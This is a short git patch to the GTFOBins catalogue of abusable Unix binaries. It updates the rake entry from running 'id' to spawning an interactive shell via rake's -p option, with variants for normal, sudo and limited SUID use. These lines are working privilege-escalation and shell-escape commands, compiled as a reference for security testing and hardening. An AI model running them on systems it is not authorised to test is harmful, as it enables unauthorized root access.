From 5decf3493a3b8078a62d343abae12975ea76b5a7 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Tue, 17 Mar 2020 20:05:53 +0100 Subject: [PATCH] Upgrade rake to proper interactive shell --- _gtfobins/rake.md | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/_gtfobins/rake.md b/_gtfobins/rake.md index f1eee61..cdf5426 100644 --- a/_gtfobins/rake.md +++ b/_gtfobins/rake.md @@ -1,7 +1,9 @@ --- functions: - command: - - code: rake -p '`/usr/bin/id`' + shell: + - code: rake -p '`/bin/sh 1>&0`' sudo: - - code: sudo rake -p '`/usr/bin/id`' + - code: sudo rake -p '`/bin/sh 1>&0`' + limited-suid: + - code: ./rake -p '`/bin/sh 1>&0`' ---